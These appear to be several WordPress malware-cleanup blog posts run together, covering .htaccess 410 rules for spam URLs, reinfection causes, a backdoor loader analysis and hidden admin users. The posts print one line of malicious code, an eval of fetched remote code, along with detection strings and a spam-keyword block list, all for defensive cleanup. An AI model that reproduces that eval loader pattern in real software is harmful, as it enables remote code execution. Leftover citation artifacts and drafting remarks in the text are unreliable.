What this does: Uses Apache .htaccess rules to return 410 Gone for obvious Japanese SEO spam URL patterns before WordPress fully loads.
Why this helps: It can reduce PHP and database load from spam requests and gives Google a clear permanent-removal signal for those hacked URLs.
What it does not do: It does not remove the malware from your files or database by itself. This is a containment and cleanup-acceleration method, not the entire recovery.
Best use case: When your site is already cleaned or being cleaned, but thousands of hacked spam URLs are still being requested or indexed.
If Google is showing thousands of fake Japanese pages under your domain, you are likely dealing with the Japanese Keyword Hack, also known as Japanese SEO spam.
This infection usually creates or serves hacked spam URLs designed to manipulate search rankings. Even after you remove the visible malware, the spam URLs can keep wasting crawl activity, polluting search results, and hammering your server with useless requests.
One practical way to contain that damage on Apache hosting is to block obvious spam URL patterns directly in .htaccess and return 410 Gone before WordPress does the heavy work.
If your hacked WordPress site is generating large volumes of spam URLs, a targeted .htaccess firewall can help by:
returning 410 Gone for known spam patterns,
reducing the amount of traffic that reaches WordPress and PHP,
making cleanup of indexed junk easier to manage.
But this only works well if the rules are site-specific and carefully tested. A bad rule can block legitimate URLs, break logins, or create more SEO problems than it solves.
What is the Japanese Keyword Hack?
The Japanese Keyword Hack is a form of SEO spam where attackers inject or generate large numbers of fake pages, often using Japanese text, spammy product terms, or junk query parameters. These pages are meant for search engines and can damage your rankings, brand trust, and crawl efficiency.
In many cases, the homepage still looks normal to the site owner. The hacked content only becomes obvious when you search Google with site:yourdomain.com or inspect strange indexed URLs in Search Console.
Example of Japanese SEO spam appearing in Google Search results.
When this .htaccess method makes sense
This approach is useful when:
your site runs on Apache or LiteSpeed and supports .htaccess,
the spam URLs follow clear repeatable patterns,
WordPress-level blocking is too slow or too heavy,
you want to stop obvious spam requests before they hit PHP.
This is not the right approach if:
your server uses Nginx and ignores .htaccess,
you have not yet identified which URL patterns are actually spam,
the rules would also catch legitimate product or page URLs,
you are trying to solve reinfection without removing the real malware.
410 vs 404: what is the real difference?
Both 404 Not Found and 410 Gone tell search engines that the content should not be indexed. In practice, 410 can be a slightly stronger “this is permanently gone” signal, which is why many cleanup specialists prefer it for hacked spam URLs.
But it is important not to overpromise this. 410 is not an instant purge button. Google still decides when to recrawl and drop the URLs. If you need faster temporary hiding in search results, use the Search Console Removals tool alongside the correct server response.
Make sure you can restore the file quickly from hosting file manager or SSH.
Test the rules on a staging copy first if the site is business-critical.
Review real spam URLs from Search Console or access logs before writing patterns.
One wrong character in .htaccess can break your entire site, so caution matters here.
Step 1: Return a lightweight 410 response
If spam bots are hammering the site, you do not want WordPress generating a heavy themed error page for every request. A small built-in 410 response can help reduce load.
If your site uses custom login URLs, membership endpoints, checkout flows, or headless routes, add those too before you block anything else.
Step 3: Block obvious spam keyword requests
If your indexed junk URLs clearly contain spam terms, you can block those patterns at the request level.
# Block obvious spam terms in the raw request
RewriteCond %{THE_REQUEST} "(casino|gambling|viagra|cialis|poker|baccarat|roulette|jackpot|dating)" [NC]
RewriteRule .* - [R=410,L]
This kind of rule is only safe when those terms are truly unrelated to your site. If you run a gambling, dating, or adult-related site, this would obviously be the wrong rule.
Many Japanese spam infections create junk URLs with simple one-letter parameters followed by long numbers, such as ?a=83748293. If your logs confirm this pattern, you can block it.
# Block suspicious one-letter parameter + long number patterns
RewriteCond %{QUERY_STRING} (^|&)[a-z]=[0-9]{8,}(&|$) [NC]
RewriteRule .* - [R=410,L]
This is one of the most useful containment rules when the infection is generating endless fake parameter URLs.
Step 5: Block fake directory patterns only if they are truly spam
If the hack is creating predictable fake paths such as /jp/ or junk product folders, you can block those too. But this is where people often overblock their own site, so be careful.
Do not blindly block .html URLs unless you are completely sure your real site does not use them. That rule is too aggressive for many WordPress setups.
The safer full example
This example is intentionally more conservative than many copy-paste snippets. Adjust it to match your actual spam patterns.
# --- START JAPANESE SEO SPAM CONTAINMENT ---
ErrorDocument 410 "410 Gone"
<IfModule mod_rewrite.c>
RewriteEngine On
# 1) Safe-list critical endpoints
RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-login.php [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-json/ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-cron.php [NC]
RewriteRule .* - [L]
# 2) Block obvious spam terms when truly irrelevant to your site
RewriteCond %{THE_REQUEST} "(casino|gambling|viagra|cialis|poker|baccarat|roulette|jackpot|dating)" [NC]
RewriteRule .* - [R=410,L]
# 3) Block suspicious one-letter numeric query strings
RewriteCond %{QUERY_STRING} (^|&)[a-z]=[0-9]{8,}(&|$) [NC]
RewriteRule .* - [R=410,L]
# 4) Block known fake directories only if confirmed from logs/Search Console
RewriteRule ^jp/ - [R=410,L]
RewriteRule ^products/[0-9]+/?$ - [R=410,L]
RewriteRule ^pages/ - [R=410,L]
</IfModule>
# --- END JAPANESE SEO SPAM CONTAINMENT ---
What to do after adding the rules
Test your homepage, login, admin, and key business pages.
Use URL Inspection in Search Console on a few hacked spam URLs.
Submit a temporary Removals request for urgent spam cleanup if needed.
Keep monitoring access logs to see whether the rules are catching the intended requests.
Make sure the underlying malware is actually removed from files, database, users, and cron tasks.
If you stop at the .htaccess layer and ignore the real infection, the spam often comes back later through the same foothold.
This method is containment, not full cleanup
A targeted .htaccess firewall can reduce load and improve cleanup speed, but it does not replace a full hacked-site recovery. You still need to:
remove malicious code from files and database,
check for hidden admin users and fake plugins,
patch the original entry point,
rotate credentials,
verify that Google is no longer seeing hacked content.
The real value of the .htaccess method is speed and efficiency. Apache can reject obvious spam URL patterns before WordPress loads, which helps protect server resources while you finish the deeper cleanup.
Used carefully, this is one of the most practical ways to contain large-scale Japanese SEO spam on Apache-based WordPress hosting. Just do not mistake containment for full recovery.
FAQ
Is 410 better than 404 for Japanese spam URLs?
It can be slightly stronger as a permanent-removal signal, but it is not magic. Either 404 or 410 can work for removed hacked URLs if they return the correct status consistently.
Will this remove the spam from Google instantly?
No. For urgent visibility cleanup, pair the correct 404/410 response with the Search Console Removals tool, which hides results temporarily while Google processes the permanent state.
Can I use this if my server runs Nginx?
No, not in .htaccess. Nginx does not use .htaccess, so you would need equivalent server rules in the Nginx configuration.
Does this clean the malware itself?
No. It only blocks request patterns. You still need to remove the infection from files, database, users, or cron-based persistence.
Should I block every suspicious pattern I see?
No. Only block patterns you have confirmed are spam. Overly broad rules can break legitimate pages, products, or site features.
⚡ Tired of cleaning the same site over and over? If your WordPress malware keeps coming back despite multiple cleanup attempts, you’re missing the persistence mechanism. Get professional malware removal — I find what scanners miss. Otherwise, this guide covers all 8 reinfection causes I see across thousands of cleanups.
You cleaned the malware. Maybe twice. Maybe five times. The site looks fine for a few hours, then the same redirects, spam pages, or infected files come right back.
You’re not going crazy. You’re not dealing with a brand new attack each time. You’re dealing with persistence — a hidden mechanism the attacker left behind specifically to survive your cleanup attempts.
I’ve cleaned over 4,500 hacked WordPress sites, and reinfection is the single most common reason clients hire me after a failed DIY cleanup. The pattern is always the same: someone removes the visible malware (the easy part), but misses the persistence layer (the part that actually matters). This guide walks you through every reinfection mechanism I’ve encountered, in priority order.
📋 Quick Diagnosis: 8 Causes of WordPress Reinfection
Hidden cron job regenerating malware on schedule
Active backdoor file the cleanup missed
Hidden admin user still in the database
Compromised access credentials (FTP, hosting, DB) that weren’t rotated
Modified core files that weren’t replaced
Malicious code in the database (not just files)
Infected sibling sites on the same hosting account
Vulnerable plugin/theme still installed (original entry point)
Most reinfection cases involve 2 or more of these simultaneously.
How to Tell You’re Dealing With Reinfection (Not a New Attack)
The pattern is recognizable once you know what to look for. You’re dealing with reinfection — not a fresh new hack — if any of these apply:
The same malicious file returns after you delete it (sometimes within minutes, sometimes within hours)
Spam pages reappear in Google search results after you removed them
The same redirect destination keeps coming back, even with different file names
Your security scanner reports clean, but Google or visitors still see infected behavior
Your host suspends the account again shortly after you reactivate it
New admin users keep appearing even after you delete them
File timestamps keep changing on files you haven’t touched
The infection follows you across hosting moves (rare, but possible if you moved infected files)
If you’re not sure whether the site is actually compromised again or just showing cached results, run through my WordPress malware detection guide first to confirm.
The 8 Reasons WordPress Malware Keeps Coming Back
I’ve ranked these by how often they’re the actual culprit in real cleanups. If you’ve already eliminated #1, move to #2, and so on.
1. A Hidden Cron Job Is Regenerating the Malware
This is the #1 reinfection cause I find — easily 60–70% of repeat infections. The attacker installed a scheduled task that automatically re-downloads or re-creates the malware on a timer. Delete the file, and the cron job restores it within minutes.
How to spot cron-based reinfection:
Malware returns at predictable intervals (every minute, every hour, every day at the same time)
Files reappear with the same content even after thorough cleanup
Your hosting provider’s logs show repeated outbound connections to suspicious domains
Where to look:
cPanel users: Cron Jobs section — look for any job containing eval, base64_decode, or gzinflate
VPS/SSH users: Run crontab -l for your user, then sudo crontab -u www-data -l for the web server user
WordPress users: Install WP Crontrol plugin and inspect WP-Cron events for unfamiliar hooks
Cron-based reinfection is so common and technically interesting that I’ve written a complete deep-dive on it. If your symptoms match this pattern, see my hidden cron job hack explained for the full removal process and a real malicious cron command analysis.
Sophisticated attackers leave multiple backdoors specifically so you’ll find one and miss the others. I commonly find 5–15 backdoor files on heavily compromised sites — and the cleanup only caught 2 of them.
Where backdoors hide that DIY cleanups miss:
/wp-content/mu-plugins/ — Must-Use plugins folder. Files here auto-load on every page load. Most site owners don’t even know this folder exists. Note: some legitimate hosts use this folder, so verify before deleting
/wp-content/uploads/ — PHP files disguised as images (.jpg.php, .png.php) or just plain .php files. No legitimate WordPress site has PHP files in uploads. See how malware hides in JPG files
Sometimes the “malware” isn’t a file at all — it’s a user account. The attacker created an administrator for themselves, hid it from your dashboard view, and logs in nightly to reinfect the site. Every cleanup is undone by the next login.
Critical insight: Sophisticated malware can hide users from the WordPress Users screen while keeping them fully active in the database. You can’t trust the dashboard alone.
How to find hidden admins:
Open phpMyAdmin via your hosting control panel
Select your WordPress database
Open the wp_users table (your prefix may differ — could be wpxx_users)
Look for users that:
You don’t recognize
Have suspicious email domains (random Gmail addresses, ProtonMail, mail.ru)
Were registered on dates you weren’t actively managing the site
Have usernames like wp-support, admin123, adminbackup, random numerics
Cross-check with wp_usermeta table — admins have wp_capabilities set to a:1:{s:13:"administrator";b:1;}
4. You Only Changed Your WordPress Password (Not Everything Else)
This is the cleanup mistake I see most often. Site owners change their WordPress admin password and assume they’ve locked the attacker out. They haven’t.
Most attackers maintain access through multiple credential paths. They might have your FTP credentials, your hosting/cPanel password, your database password, your email account (which can reset everything else), or your Cloudflare account. Changing only WordPress is like locking the front door while leaving five windows open.
What you must rotate after a hack:
WordPress admin passwords (every admin user, not just yours)
Hosting/cPanel/Plesk control panel password
FTP and SFTP credentials
SSH credentials and SSH keys
Database password (update wp-config.php after changing)
Email accounts that can reset other passwords
Cloudflare or DNS provider account
CDN account if separate from your host
Any third-party service connected via API keys (Stripe, Mailchimp, etc.)
Critical step: Reset WordPress salts. Even with new passwords, existing logged-in sessions remain valid. Generate new salts at api.wordpress.org/secret-key/1.1/salt and replace the matching lines in wp-config.php. This instantly invalidates every active session, including hacker sessions.
Your cleanup might have removed obvious malware files but left modifications to legitimate WordPress core files. Files like wp-load.php, wp-blog-header.php, or files inside wp-includes/ can have malicious code injected into them — code that executes on every page load.
The fix: Don’t try to clean modified core files line-by-line. Replace them entirely:
Download fresh WordPress from wordpress.org
Delete your existing /wp-admin/ and /wp-includes/ folders
Some of the most frustrating reinfection cases I see involve sites that scan completely clean at the file level — but visitors still get redirected, Google still shows spam pages, or hidden links still appear in search results.
The reason: the malware lives in your database, not your files.
Where database malware hides:
wp_options table — Especially the active_plugins, siteurl, home, and any autoloaded options. Search for base64_decode, <script, or unfamiliar URLs
7. Another Site on the Same Hosting Account Is Infected
This one gets missed constantly. If you have multiple WordPress sites under one cPanel account, an old staging copy, an abandoned subdomain, or a forgotten dev install — the malware can reinfect your main site from any of them.
Shared hosting plans often allow file-level access between sites in the same account. Malware on oldsite.com sitting in the same hosting account can write files to yoursite.com. You clean the main site, but the infected sibling site reinfects it within hours.
What to audit on the same hosting account:
Every domain hosted under the account
Every subdomain (especially old ones you forgot about)
Old WordPress installs in subdirectories (/old/, /backup/, /v1/)
Backups stored in web-accessible folders (download them off-site, then delete)
Test installs that nobody remembers anymore
If reinfection makes no sense based on the main site alone, this is usually why.
8. The Original Vulnerability Is Still Present
Cleanup removes the malware. It doesn’t always patch the hole the attacker came through. If your initial entry was a vulnerable plugin and you cleaned the malware without updating that plugin, attackers exploit the same vulnerability and reinfect within hours of cleanup.
Critical step: Update everything immediately after cleanup. WordPress core, every plugin (active or inactive), every theme. Remove unused plugins and themes entirely. If you can’t update a plugin because it’s been abandoned, find a replacement.
The Permanent Reinfection Fix Workflow
If you’ve cleaned this site multiple times and it keeps coming back, surface-level scanning isn’t enough. Here’s the comprehensive workflow I run on every paid reinfection cleanup:
Step 1: Take a Forensic Backup of the Infected State
Before changing anything, back up the current state to your local computer (not the server). This gives you evidence, lets you compare files later, and protects against accidentally deleting something legitimate during cleanup.
Step 2: Lock the Site Down
Put the site in maintenance mode using SeedProd or a similar plugin. If actively redirecting visitors, restrict /wp-admin/ access to your IP only via .htaccess:
<Files wp-login.php>
Order Deny,Allow
Deny from all
Allow from YOUR.IP.ADDRESS.HERE
</Files>
Step 3: Rotate ALL Credentials (Not Just WordPress)
Cycle through the complete list from #4 above: hosting, FTP, SSH, database, email, Cloudflare, third-party APIs. Then reset WordPress salts to invalidate all sessions.
Step 4: Audit Cron Jobs First
Before doing anything else, check cron — both server-level cron and WP-Cron. If a malicious cron job exists, every cleanup step that follows is wasted effort until cron is clean. See the dedicated cron job malware guide.
Step 5: Replace Core Files
Delete /wp-admin/ and /wp-includes/, replace with fresh WordPress.org copies, replace root PHP files. Keep /wp-content/ and wp-config.php untouched.
Step 6: Audit Every Plugin and Theme
Compare your /wp-content/plugins/ folder count against the dashboard count — extra folders are ghost plugins
Delete any plugin you don’t actively use
Replace remaining plugins with fresh copies from official sources
Same process for themes — only one active theme should remain
Stop using nulled plugins/themes immediately
Step 7: Database Surgery
Open phpMyAdmin and:
Audit wp_users for hidden admin accounts (see #3)
Search wp_posts for <script, display:none, position:absolute, base64
Search wp_options for unusual autoloaded values
Look at wp_usermeta for unauthorized capability changes
Step 8: Hunt Backdoors with Grep
If you have SSH access, run the grep commands from #2 above. If not, manually inspect:
Active theme’s functions.php, header.php, footer.php
Files in /wp-content/uploads/ — there should be NO PHP files here
/wp-content/mu-plugins/ — verify each file is legitimate
wp-config.php — check the very top and very bottom for added code
All .htaccess files — check root, /wp-admin/, /wp-content/, /uploads/
Step 9: Audit Every Site on the Hosting Account
Don’t just clean the main site. Run the same audit on every domain, subdomain, staging copy, and forgotten install on the hosting account. One missed sibling site reinfects everything.
Step 10: Harden Against Future Attacks
After cleanup, implement these protections to prevent the next infection:
Update WordPress core, all plugins, all themes
Add define('DISALLOW_FILE_EDIT', true); to wp-config.php
Enable two-factor authentication on all admin accounts (2FA setup guide)
Once clean, verify on multiple devices, browsers, and from logged-out sessions. If Google still shows warnings, request review through Search Console with detailed cleanup notes. If hacked spam URLs are still indexed, see 404 vs 410 for hacked URLs.
Here’s an uncomfortable truth: your security scanner reporting clean is not proof your site is clean.
I see this constantly. A site owner runs Wordfence, gets a green checkmark, and assumes everything’s fine. Meanwhile:
Google still shows the site as flagged
Visitors on mobile devices still get redirected
Logged-out users see different content than logged-in users
Search results still contain Japanese spam URLs
Customers report seeing scam ads on the site
This happens because modern malware uses cloaking — it shows clean content to security scanners and admin users while serving malicious content to other visitors. Some malware only activates for traffic from Google, only on mobile devices, only in certain countries, or only after certain time delays.
If WordPress malware keeps coming back even though scanners say you’re clean, assume the investigation is incomplete and dig deeper. The cloaking detection guides that help here:
Why does my WordPress malware keep coming back at the same time every day?
That’s almost always a scheduled reinfection — either WP-Cron or a server-level cron job re-downloading or re-creating the malware on a timer. If reinfection happens at predictable intervals, check cron jobs first using cPanel’s Cron Jobs section, crontab -l via SSH, or the WP Crontrol plugin. See my complete cron job malware guide.
Why does Wordfence say my site is clean if WordPress malware keeps coming back?
Security plugins detect known malware signatures, but they miss roughly 40% of modern malware. Common things they don’t catch: ghost plugins that hide from your dashboard, hidden admin users in the database, malicious code in wp_options, cloaked malware that shows clean content to scanners, and custom backdoors with no signature match. A clean scan is a positive signal, not proof.
How do I permanently stop WordPress reinfection?
Permanent fix requires addressing all 8 reinfection causes systematically: kill malicious cron jobs, find missed backdoors, remove hidden admin users, rotate every credential (not just WordPress), replace core files entirely, clean the database, audit sibling sites on the same hosting account, and patch the original vulnerability. Skipping any of these leaves a path back in.
Is it cheaper to clean my site or buy a new domain?
Clean the site. Buying a new domain doesn’t help if your hosting account is compromised — the new domain will get infected too. The malware lives on the server, not in the domain name. The only case where moving makes sense is if your IP address itself is permanently blacklisted across multiple vendors and your host can’t change it.
Can my hosting provider help with reinfection?
Most shared hosts (Bluehost, GoDaddy, HostGator) won’t actively clean malware — they’ll suspend the account and require you to clean it. Some managed WordPress hosts (Kinsta, WP Engine) offer cleanup as a paid add-on, but their cleanup is typically surface-level. For genuine reinfection cases, you usually need WordPress security expertise that goes beyond standard hosting support.
How long does it take to fix a reinfected WordPress site?
Reinfection cleanups take longer than first-time cleanups because you’re working against active persistence mechanisms. Simple cases (single cron job, easy to find): 2–4 hours. Complex cases (multiple persistence mechanisms, sibling site infection, database malware): 6–12 hours. The investigation phase is the longest part — you’re hunting for what your previous cleanup missed.
Should I restore from a backup instead of cleaning?
Only if your backup predates the original infection. Most reinfection victims don’t have a clean pre-infection backup, because they didn’t realize the site was infected for weeks or months. If you do restore, you must still patch the original vulnerability — otherwise reinfection happens again immediately. Test the restored backup on a staging site before going live.
What if my host suspended the account again after cleanup?
That’s a strong signal you missed the persistence mechanism. Hosts re-suspend accounts when their automated scans detect malware activity again. Contact your host for the specific files they detected, then dig into those areas. Often it’s a backdoor file or cron job they specifically flagged.
Get Help Finding the Persistence Mechanism
If you’ve cleaned this site twice and the malware keeps coming back, the next attempt by the same DIY approach won’t work either. The job at this point isn’t “scan again” — it’s finding the one persistence mechanism that survived your last cleanup.
That investigation is the part where most plugins fail and the part I do manually on every reinfection cleanup. I work through cron jobs, hidden users, ghost plugins, database injections, sibling site spread, and credential rotation systematically. Most reinfection cases I take on get fixed within 4–8 hours.
Stop the reinfection cycle
Get the deep investigation that finds what scanners and DIY cleanups miss.
About the author: Md Pabel is a WordPress security specialist with 7+ years of experience and 4,500+ successful site cleanups. He documents real-world reinfection investigations and persistence mechanisms at mdpabel.com.
Quick Answer: I found strange PHP files in wp-content. Is my site hacked?
If you find unknown files like fa.php, fazel.php, or trigger.txt directly inside /wp-content/, treat them as suspicious and investigate immediately. In the case below, those files were part of a small backdoor loader that could fetch and run a second-stage payload on the server.
Back up the current state first.
Do not delete one file and assume the problem is over.
Check nearby persistence points:wp-config.php, .htaccess, plugins, cron, and the database.
Rotate all access after cleanup: WordPress, hosting, FTP/SFTP, database, and salts.
The client did not come to me because the homepage was defaced or the site was completely down.
The site still worked. It just felt wrong.
That is how a lot of modern WordPress infections behave. They stay quiet long enough to avoid attention, then give the attacker a way back in whenever they want it.
In this cleanup, I logged into the client’s DreamHost file manager and checked /wp-content/. That is where I found three files that had no legitimate reason to be sitting there:
fa.php
fazel.php
trigger.txt
The names were generic enough to be ignored at first glance. That is part of what made them dangerous.
On a hacked site, this is exactly the kind of thing I look for: loose files with vague names, sitting in places where they do not belong, and blending in just enough that the site owner never questions them.
Why These Files Were a Red Flag
wp-content is a normal WordPress directory, but that does not mean every file inside it is normal.
Plugins, themes, uploads, and other site-specific assets live under wp-content. What concerned me here was the combination of location, file type, and naming:
two unexplained PHP files placed directly in wp-content/
a text file named trigger.txt sitting beside them
no legitimate plugin or theme reason for those files to be there
That does not happen in a healthy WordPress install by accident.
After I found the files, I opened the code to see what the attacker had actually left behind.
This was not a full visual web shell on its own. It was a loader — a small piece of code whose job was to pull in the real payload later.
1. It fetched a second-stage payload
In the sample I analyzed, the code used a function named geturlsinfo to request content from a remote URL. That is the first big clue that you are not dealing with a harmless stray file.
A loader like this does not need to contain the whole attack. It only needs enough logic to reach out, pull down code, and execute it when needed.
2. It used trigger.txt as a simple control file
In this case, the script checked the contents of trigger.txt before running. That made the file more than harmless clutter. It acted like a basic switch for the loader.
The important point is not that every malware sample uses a file with this exact name. The important point is that attackers often leave behind tiny helper files that control when or how the backdoor runs.
3. It executed the fetched code with eval()
The most dangerous behavior in the sample was this line:
eval('?>' . $a);
In plain English, that means: take the code that was just pulled in and run it on the server.
That is what turns a “strange file” into a real compromise.
If an attacker can fetch and execute remote code like that, they do not need to keep uploading every payload manually. They already have a working door back into the site.
Technical Breakdown: Why This Loader Was Dangerous
For developers and technical site owners, here is why this was more than a random stray script.
1. It tried to blend in with normal traffic
The sample included a browser-like user agent string. That is a common trick. It helps outbound requests look more like normal web traffic instead of an obvious automated fetch.
2. It had fallback methods
The script did not rely on only one outbound function. It tried several common PHP methods so it could still pull a payload even if one approach was unavailable on that server.
curl_exec
file_get_contents
fopen
That kind of fallback logic tells you the file was written for reliability, not by accident.
3. It appeared to be pulling an Alfa-style shell
In the sample I reviewed, the fetched payload name suggested an Alfa-style web shell. That matters because once a web shell lands on a server, the attacker can browse files, modify PHP, read configuration data, and plant more malware without going through the normal WordPress login flow.
This is why I treat loader files seriously even when the visible site still looks normal.
No. WordPress plugins and themes use PHP. What made this case suspicious was the location, the filenames, and the fact that the client had no legitimate reason for those loose files to exist directly in wp-content/.
Can I just delete fa.php and move on?
Not safely. If one loader file exists, there may be other persistence points in the database, wp-config.php, cron, plugins, or other writable folders.
Why didn’t the WordPress dashboard warn me?
Because file-level backdoors do not need to show up as plugins or visible admin changes. Many infections live quietly in the filesystem until they are used.
What if the files come back after I remove them?
That usually means the real entry point or persistence mechanism is still active. At that point, you are dealing with reinfection, not just leftover files.
Need Help Cleaning a Hidden WordPress Backdoor?
If you found strange files in your hosting panel and you are not sure whether they are harmless or malicious, do not guess.
A file-level backdoor is exactly the kind of infection that gets missed when someone only checks the dashboard or deletes one obvious file.
If your WordPress site is redirecting visitors, showing strange popups, or behaving normally for you but badly for real users, malicious JavaScript may be hiding inside your theme or plugin files.
This is one of the most frustrating WordPress malware patterns to clean because the injected code often sits inside legitimate JavaScript files, usually near the bottom, and is heavily obfuscated to avoid detection.
I’ve cleaned 4,500+ hacked WordPress sites, and this type of infection shows up again and again in real cleanup jobs. The site owner sees a strange redirect, spam warning, or traffic drop, but the actual malware is buried inside a file that looks normal at first glance.
This guide focuses on the practical part: how to find malicious JavaScript in WordPress files, review it safely in VS Code, remove it without breaking the site, and reduce the chance of reinfection afterward.
Where Malicious JavaScript Usually Hides in WordPress
In real WordPress infections, I most often find injected JavaScript in:
theme files, especially custom or public JS files
plugin JavaScript files, especially in older or poorly maintained plugins
minified asset files that owners rarely inspect manually
files appended at the bottom after otherwise legitimate code
Sucuri’s March 2025 write-up on a large-scale campaign showed attackers injecting malicious JavaScript into legitimate theme files, including a WordPress theme JS file where the malware sat at the bottom of the file. :contentReference[oaicite:6]{index=6}
That placement matters because it makes the file still look mostly normal until you scroll to the end.
What This Malware Usually Looks Like
The sample behind this guide uses a classic heavily obfuscated wrapper. It begins with scrambled strings, arithmetic expressions, decoder functions, and dynamic request logic designed to hide what the code is actually doing.
Infected files often contain signs like:
unexpected code appended after normal JavaScript
long blocks of unreadable obfuscated text
odd variable names like fqsq, a0B, or similar
use of XMLHttpRequest, decoding helpers, or eval
logic that fetches a second payload from an external server
That matches both the live sample on your site and the broader campaign reporting, which describes injected JavaScript that loads external content and performs redirection through attacker-controlled infrastructure. :contentReference[oaicite:7]{index=7}
How to Find Malicious JavaScript in WordPress Files Using VS Code
Step 1: Download a full local copy first
Before editing anything, download the entire site or at least the affected theme and plugin directories. Work on a local copy first whenever possible.
Do not make your first edits on the only live copy of the site unless you have no safer option.
Step 2: Open the site folder in VS Code
Open VS Code
Go to File → Open Folder
Select the downloaded site folder
Step 3: Search for suspicious patterns
Use Ctrl+Shift+F on Windows/Linux or Cmd+Shift+F on Mac to search the full project.
These are not proof by themselves, but they are good starting points when you are looking for obfuscated JavaScript malware.
Step 4: Open the flagged file and jump to the end
Many JavaScript injections are appended to the bottom of an otherwise legitimate file. So after opening a suspicious result, jump to the end and compare what you see with the rest of the file.
Strong warning signs include:
a sudden formatting change
a large obfuscated block after normal site code
a script that clearly does something unrelated to the file’s purpose
How to Remove the Malware Without Breaking the File
This is the part where site owners often make things worse by deleting too much or editing the live file carelessly.
Step 1: Identify where the legitimate code ends
Before deleting anything, confirm where the normal JavaScript stops and the injected malware begins.
In many infections, there is a clear break: legitimate site code above, then a semicolon and a large obfuscated payload below.
Step 2: Remove only the malicious block
Select only the injected code and delete that part, not the whole file.
If you remove the entire JavaScript file, you may break legitimate theme or plugin functionality.
Step 3: Check syntax immediately
After deletion, review the last lines of the file. Make sure the file still ends cleanly and that VS Code is not showing obvious syntax errors.
If you see errors, undo the change and compare the cut more carefully.
Step 4: Search again to verify the pattern is gone
After cleaning all infected files, re-run your searches for the same suspicious patterns. If the core signature still appears elsewhere, you are not done yet.
Important: This May Not Be the Whole Infection
The live version of this article says the most important takeaway is that file-based malware is entirely in the files and not the database. I would not keep that line.
In real WordPress cleanups, JavaScript malware often starts in files, but it can coexist with:
database injections
redirect rules in .htaccess
hidden admin users
cron-based reinfection
additional backdoors elsewhere on the server
So after cleaning the visible JavaScript, also check:
Upload the cleaned versions over the infected files
Test the site immediately afterward
Check front-end functionality and browser console behavior
I would treat direct live-server editing as a backup option, not the default workflow. Local cleanup plus controlled upload is usually safer.
What to Do After the JavaScript Is Removed
Do not stop after the visible payload is gone.
After cleanup, I recommend:
updating WordPress core, themes, and plugins
removing unused plugins and themes
changing WordPress, FTP/SFTP, and hosting passwords
reviewing file permissions carefully
disabling dashboard file editing
checking logs for suspicious access
WordPress’s developer docs explain that permissions matter because WordPress needs controlled write access to some paths, especially under wp-content, and overly loose write access increases risk. :contentReference[oaicite:8]{index=8}
How do I know if a JavaScript file is really infected?
Look for code that clearly does not belong in that file: obfuscation, external fetch logic, redirect behavior, strange variable names, or a large injected block appended after legitimate code.
Should I delete the whole JavaScript file?
No, not unless you are replacing it with a known-clean copy. In most cases you only want to remove the malicious block while preserving the legitimate file.
What if the malware is in the middle of the file instead of the end?
That can happen. In that case, identify the malicious block carefully, remove only that section, then verify the remaining JavaScript still forms valid code.
Do I need a reconsideration request in Google Search Console after cleanup?
Only if Google shows a security issue or manual action that requires review. For specific cleaned URLs, use the URL Inspection tool to check status and request indexing when appropriate. :contentReference[oaicite:9]{index=9}
Can this kind of malware come back after I remove it?
Yes. If you do not remove the original entry point or additional backdoors, the attacker can reinfect the same files later.
Need Help Cleaning Obfuscated JavaScript Malware?
If your WordPress site is redirecting visitors, serving malicious scripts, or showing signs of obfuscated JavaScript injection, I can help trace the load path, clean the infected files, and make sure the infection does not come back the next day.
If you suspect a hidden admin user on your WordPress site — maybe your dashboard says “All Users (1)” but a security plugin counter shows “2”, maybe your malware keeps coming back after cleanup, or maybe new admin accounts you didn’t create keep appearing — you’re dealing with one of the most sophisticated WordPress backdoors in active circulation. The malware creates an invisible administrator account, hides it from your Users screen using WordPress’s own filter hooks, and recreates the account every time you delete it. The fix is to first find and remove the malicious code (typically in functions.php, mu-plugins/, or a fake plugin folder) — only then can you delete the rogue user safely. Skip step one and the user comes back within seconds.
Quick Answer: Hidden admin user on WordPress — what to do
The smoking gun: if your “All Users” count doesn’t match what a security plugin (like 2FA, Wordfence, or activity log) shows, you almost certainly have a hidden admin
Why deleting the user doesn’t work: the malicious code recreates it on the next page load — you must remove the code first
Where the code hides: theme functions.php, wp-content/mu-plugins/, fake plugin folders with names like wp-compat, CacheFusion, CDNConnect
Common rogue usernames I see:adminbackup, adm1nlxg1n, support_user, sys_maint_service, help, codepapa
How to verify: check the database directly via phpMyAdmin — a hidden admin still exists in wp_users even when WordPress hides it from the dashboard
The Moment You Realize Something’s Wrong
There’s a specific moment that brings WordPress site owners into my inbox more than any other backdoor symptom: they’re looking at their Users page in the WordPress dashboard, and the numbers don’t add up.
Maybe their “All Users” count says (1) — just them, the legitimate admin. But somewhere else on the same page, a third-party plugin counter shows something different. A 2FA plugin says 2 Inactive. An activity log shows recent logins from a username they don’t recognize. Wordfence reports more administrators than the dashboard shows.
The math doesn’t work. And that math discrepancy is the single most reliable indicator of a hidden admin user backdoor — one of the most dangerous and persistent malware families currently affecting WordPress.
The classic smoking gun: “Alle (1)” but “2FA Inactive (2)” — the malware can lie to WordPress, but it forgot to lie to the third-party plugin.
In the past 18 months, I’ve found this exact attack pattern on hundreds of WordPress sites — including high-traffic e-commerce stores, business sites, and membership platforms. The malware is sophisticated, the attack is persistent, and it’s the single most common reason “cleaned” WordPress sites get reinfected within days.
This guide walks through exactly how the attack works, how to spot it, how to verify it, and most importantly — how to remove it without it coming straight back. Real code samples from real cleanups. No theory.
If you’re confident your site is compromised and you need urgent help, my WordPress malware removal service handles exactly this attack class.
Why Hidden Admin Users Are More Dangerous Than Visible Malware
A visible malware file gets noticed and cleaned. A hidden administrator gets kept. That distinction is the entire point of the attack.
When attackers maintain hidden admin access, they can:
Maintain persistence even after thorough file cleanup. You delete the visible malware. They log back in with their hidden account and reinfect the site within minutes.
Avoid triggering the original entry-point vulnerability again. The attacker doesn’t need to re-exploit a plugin or guess a password. They walk in through the front door using their stealth admin account.
Install plugins, edit theme files, create more users, plant more backdoors. An admin account has unlimited capability inside WordPress.
Stay invisible while you watch. The dashboard looks normal. The site loads correctly. Nothing visibly wrong — until the next infection.
Coordinate with other malware. Hidden admin users are usually one component in a larger compromise — typically paired with backdoor PHP files, modified core files, scheduled cron jobs, or database injections.
